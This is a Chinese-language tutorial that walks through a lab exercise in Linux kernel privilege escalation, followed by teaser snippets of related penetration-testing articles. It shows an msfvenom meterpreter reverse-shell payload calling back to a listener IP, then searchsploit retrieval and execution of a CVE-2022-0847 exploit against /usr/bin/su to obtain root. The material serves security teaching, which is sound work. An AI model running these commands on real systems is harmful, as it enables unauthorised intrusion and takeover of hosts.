关键词:
Linux 内核提权
Linux 内核提权原理
内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:
1、对目标系统进行信息收集,获取到系统内核信息及版本信息;
2、根据内核版本获取其对应的漏洞以及EXP
3、使用找到的EXP对目标系统发起攻击,完成提权操作
查看Linux操作系统的内核版本和相关信息
cat /etc/issue 查看ubuntu或者centos的版本
cat /etc/*-release 查看centos版本
uname -a 查看系统全部信息
uname -r 查看内核版本
EXP该怎么着呢,可以用Kali去寻找,kali中自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞
输入 searchsploit -m 9479.c 就会自动复制该文件到当前目录
提权环境
本次实验使用Ubuntu 20.04,内核版本是5.10版本的
如何替换Linux版本系统内核可以看这篇文章Linux Ubuntu 20.04 LTS 更新到最新长期支持内核 v5.10.9
提取复现
使用MSF机器上线
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=3333 -f elf > mshell.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 3333
run
发现我们只有普通用户daoer的权限
查看对方操作系统
cat /etc/issue
cat /etc/*-release
uname -r
可以看到对方的操作系统的版本内核为5.10.10
接下来我们打开kali,去搜索一下对应的版本
发现有这么几个可以进行内核提权的CVE,我们去下载对应的代码
searchsploit -m 50808.c
发现他的CVE编号是CVE-2022-0847,我们通过百度去搜索相应的CVE编号,然后我们就可以根据网上的文章去复现使用相应的漏洞
在文章中直接找到如何使用EXP的内容,按照内容去复现就好了
由于我们下载好的文件是.c文件,需要将文件上传到目标机器上去编译,否者可能会出现一些运行环境方面的问题
upload 文件路径
编译文件
gcc -o test 50808.c
生成了一个test脚本
我们去使用这个脚本
./test /usr/bin/su
现在提升到root权限了,内核提权成功的
kali权限提升之本地提权
kali权限提升之本地提权系统账号之间权限隔离 操作系统的安全基础 用户空间 内核空间系统账号: 用户账号登陆时候获取权限令牌 服务账号无需用户登录已在后台启动服务windows用户全权限划分: Users:普通... 查看详情
内网渗透测试理论学习之第三篇内网渗透权限提升(代码片段)
...章目录一、内核溢出漏洞二、系统配置错误1、系统服务权限配置错误2、注册表键AlwaysInstallElevated3、可信任服务路径漏洞(TrustedServicePaths)4、自动安装配置文件5、计划任务三、组策略首选项提权漏洞四、绕过UAC提权五... 查看详情
内网渗透之提权(代码片段)
...权SQLServerxp_cmdshell提权sp_oacreate提权CLR执行系统命令DB_owner权限LOG备份提权DB_owner权限差异备份提权shell反弹命令的一些收集关于WIndows系统的反弹shell命令的一些收集 关于Linux系统的反弹shell命令的一些收集对于Windows系统的提权内... 查看详情
17_服务器提权
...分类 Linux提权 Windows提权2.Windows提权(前提是:有操作系统漏洞,其次是想办法执行cmd) 操作系统漏洞提权 第三方服务提权3.Windows操作系统漏洞 根 查看详情
linux提权宝典(代码片段)
...限账户转换为高权限用户。方法多种多样,可能通过操作系统或应用程序的漏洞、设计缺陷或配置不当等实现未授权的操作。高权限可进一步利用的方法:重置其他账户密码访问其他账户权限文件绕过访问控制的权限操... 查看详情
linux权限提升—定时任务环境变量权限配置不当数据库等提权(代码片段)
Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权1.前言1.1.如何找编译好的EXP2.定时任务提权2.1.查看定时任务2.2.通配符注入提权2.2.1.创建执行脚本2.2.2.创建定时任务2.2.3.查看效果2.2.4.提权操作2.2.4.1.切换普通用... 查看详情
内网渗透系列:权限提升方法小结(代码片段)
目录前言一、Windows1、BypassUAC(1)常用方法(2)常用工具2、提权(1)windows内核漏洞提权(2)服务提权(3)配置错误(4)其他(5)提权脚本二、Linux1、内核溢出提权2、计 查看详情
内网渗透系列:权限提升方法小结(代码片段)
目录前言一、Windows1、BypassUAC(1)常用方法(2)常用工具2、提权(1)windows内核漏洞提权(2)服务提权(3)配置错误(4)其他(5)提权脚本二、Linux1、内核溢出提权2、计 查看详情
windows权限提升—令牌窃取uac提权进程注入等提权(代码片段)
Windows权限提升—令牌窃取、UNC提权、进程注入等提权1.前言2.at本地命令提权2.1.适用范围2.2.命令使用2.3.操作步骤2.3.1.模拟提权2.3.2.at配合msf提权2.3.2.1.生成木马文件2.3.2.2.设置监听2.3.2.3.设置反弹2.3.2.4.查看反弹效果3.sc本地命令提... 查看详情
linux提权之sudo提权
...do(无密码型)普通用户可以无密码提升到管理员权限前提是/etc/sudoers写了这个普通用户可以无密码执行命令演示:可以看到该文件配置我的普通用户hdh配置权限root时不需要密码然后我们换成root权限可以看到不用输... 查看详情
linux内核漏洞提权(以cve-2015-1328为例)(代码片段)
...洞提权拿shell提权附件Linux内核漏洞提权一般webshell拿到的权限都是web容器权限,如iis就是iss用户组权限,apache就是apache权限,可以执行普通命令,但是如果要进行内网渗透就需要拿到系统权限或者超级管理员权限l... 查看详情
linux提权第三篇-gnuclibrary动态链接库$origin溢出提权(代码片段)
...荐阅读GNUCLibrary动态链接库$ORIGIN溢出提权提权利用tmp目录权限、suid权限和c语言是普通账号提权为root权限适合RHEL5-RHEL6Centos5-Centos6系统提权靶机环境: centos5.5新建普通用户useraddoceanpasswdoceansuocean创建目录mkdir/tmp/expln/bin/ping/tmp... 查看详情
cobaltstrike使用-第五篇(bypassuaccve提权powerup提权)(代码片段)
...的方法,本篇将会介绍使用CS进行提权操作文章目录权限提升BypassUACCVE提权PowerUp凭证和哈希获取Beacon中的Mimikatz权限提升在主机上线后,当某些操作需要管理员权限,而当前用户权限只有一般用户权限时,就需要... 查看详情
相互帮助:微软在linux中发现了两个提权漏洞
导读Microsoft365Defender研究团队在 Linux 操作系统中发现了两个漏洞,分别被跟踪为CVE-2022-29799和CVE-2022-29800(统称为Nimbuspwn),可允许攻击者提升权限以获取root权限并安装恶意软件。Microsoft365Defender研究团队在Linux... 查看详情
什么是电脑内核提权漏洞?
...无上"的统治者内核态的程序拥有一切权限,在WINDOWS操作系统上,没有任何其他软件可以限制内核态程序的行为,因此一旦内核提权漏洞被触发,攻击者就可以操纵系统一切可以操纵的资源,做任何想做的事情,一旦一个内... 查看详情
windows提权第一篇-内核溢出漏洞提权(代码片段)
...ws提权的常见方法Windows系统常见命令内核溢出漏洞提权IIS权限拿shell提权过程信息收集提权apsx提权为什么需要提权读取/写入敏感文件重新启动之后权限维持插入永久后门Windows提权的常见方法1.内核漏洞2.错误的服务权限配置3.DLL... 查看详情
linux提权——sudo(代码片段)
使用Sudo权限提升Linux账户权限在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图Sudoer文件语法假如我们(root用户)要给普通用户test分配sudo权限,... 查看详情
sudo提权实战讲解对用户对组的权限配置分析
Linux是多用户多任务的操作系统,共享该系统的用户往往不只一个。出于安全性考虑,有必要通过useradd创建一些非root用户,只让它们拥有不完全的权限;如有必要,再来提升权限执行。sudo就是来解决这个需求的:这些非root用户不需要... 查看详情